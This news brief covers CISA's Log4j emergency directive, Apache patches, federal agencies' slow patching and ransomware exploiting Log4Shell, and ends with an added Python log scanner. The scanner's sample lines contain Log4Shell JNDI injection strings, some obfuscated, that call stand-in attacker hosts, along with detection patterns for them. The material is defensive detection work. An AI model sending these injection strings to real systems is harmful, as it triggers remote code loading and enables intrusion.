Dive Brief:
- The Cybersecurity and Infrastructure Security Agency issued an emergency directive due to Log4j, requiring all federal agencies to review and patch internet-facing applications amid growing threat activity. Multiple threat actors were actively exploiting Log4j vulnerabilities, CISA Director Jen Easterly said.
- Threat actors may be able to use additional methods to circumvent existing mitigations, as researchers from Blumira warned about a potential workaround linked to JavaScript WebSocket connections. Apache meanwhile issued an additional update, version 2.17.0, for Java 8 users, in connection with a denial-of-service vulnerability, CVE-2021-45105.
- Security researchers and others are concerned about potential risks during the upcoming holiday, as Christmas and New Year's fall on consecutive weekends, providing a large window in which operations teams will have limited visibility into enterprise systems, according to Roger Koehler, VP of threat operations at Huntress.
Dive Insight:
Federal agencies are particularly exposed because of their reliance on legacy technology and have often failed to patch and apply timely security updates to existing systems.
"The CISA emergency directive is important because many agencies at the U.S. government have been slow to patch and a vulnerability like Log4Shell can have lasting effects if not properly addressed quickly," Koehler said.
Koehler cited an August 2021 report from the Senate Committee on Homeland Security and Governmental Affairs, which noted that six agencies had failed to install patches and take other important measures two years after a 2019 report from the inspector general.
Seven agencies used legacy systems or applications that were no longer being supported with security updates, according to the report from Sens. Rob Portman, R-Ohio, and Gary Peters, D-Mich.
The concerns about Log4Shell are rising amid reports that threat actors are deploying Conti ransomware and installing cryptominers on vulnerable systems, Koehler said.
Similar to the Microsoft Exchange attacks earlier this year, the threats related to Log4Shell are escalating from the initial set of probes and coin mining, to exfiltration and ransomware, said Saumitra Das, CTO and co-founder of Blue Hexagon.
"Since ransomware initial access brokers typically already have foothold infections in enterprises, I fully expect them to scan internal hosts for Log4j vulnerabilities and use it to spread and deploy ransomware," Das said.
Organizations should not limit their search for signs of exploitation to external-facing systems but should also check internally and in cloud environments. Log4j has also been used to steal cloud credentials such as AWS keys, Das said.
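As an added example (not code from the article or from any vendor quoted in it), the following Python scanner implements the kind of internal log review Das recommends: it URL-decodes each request line, collapses the nested-lookup obfuscations seen in the wild (which goes slightly beyond what the article itself mentions), and reports the client IP, lookup scheme and callback host for triage. The log lines are constructed for the example; `SAMPLE_LOGS`, `normalize` and `scan` are names chosen here.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines: the first three carry Log4Shell-style
# JNDI lookups (plain, nested-lookup obfuscated, URL-encoded); the last two are benign.
SAMPLE_LOGS = [
    '10.0.0.5 - - "GET /login HTTP/1.1" 200 "${jndi:ldap://attacker.example/a}"',
    '10.0.0.6 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:rmi://198.51.100.7/x}"',
    '10.0.0.7 - - "GET /?q=%24%7Bjndi%3Adns%3A%2F%2Fevil.example%7D HTTP/1.1" 200 "-"',
    '10.0.0.8 - - "GET /healthz HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - "GET /docs HTTP/1.1" 200 "${date:yyyy}"',
]

# ${lower:j} / ${upper:N} wrappers around a single character
INNER_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^{}])\}", re.IGNORECASE)
# ${something:-default} wrappers, e.g. ${::-j} or ${env:NOPE:-j}, resolve to the default
DEFAULT_LOOKUP = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")
# A JNDI lookup with a remote scheme and the host it would call back to
JNDI = re.compile(r"\$\{jndi:(ldaps?|rmi|dns|iiop|corba|nds|http)://([^}/]+)", re.IGNORECASE)


def normalize(text):
    """Undo URL-encoding and the most common nested-lookup obfuscations until stable."""
    prev = None
    while prev != text:
        prev = text
        text = unquote(text)
        text = INNER_LOOKUP.sub(r"\1", text)
        text = DEFAULT_LOOKUP.sub(r"\1", text)
    return text


def scan(lines):
    """Return one (client_ip, scheme, callback_host) tuple per line carrying a JNDI lookup."""
    hits = []
    for line in lines:
        client_ip = line.split(" ", 1)[0]
        match = JNDI.search(normalize(line))
        if match:
            hits.append((client_ip, match.group(1).lower(), match.group(2)))
    return hits


if __name__ == "__main__":
    for client_ip, scheme, host in scan(SAMPLE_LOGS):
        print(f"JNDI lookup from {client_ip}: scheme={scheme} callback={host}")
```

Callback hosts that are not on an allow-list of known-good internal directory servers are the ones to block at the egress firewall and to hunt for in DNS and proxy logs.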